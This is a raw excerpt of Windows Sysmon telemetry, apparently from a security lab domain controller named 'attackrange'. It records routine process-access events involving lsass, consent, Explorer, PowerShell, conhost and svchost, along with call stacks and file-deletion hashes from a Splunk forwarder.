08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.907{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.907{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.776{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.776{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26AC1F71EBEBC89B9FEF9E1009C34F38,SHA256=55779F2F3D63FE6FD288472799E6FF11426EFBB41DBD9A952389D8E3ADCEF87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C9824E85730C2E2E095A7BE163B58C5,SHA256=68CB141A92E38C3225E0FFF19E38C64276F5148E923A0485C84851861395A8A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.391{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001053980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.391{466BC892-32D3-60E8-700B-00000000CF01}16645372C:\Windows\System32\sihost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.391{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 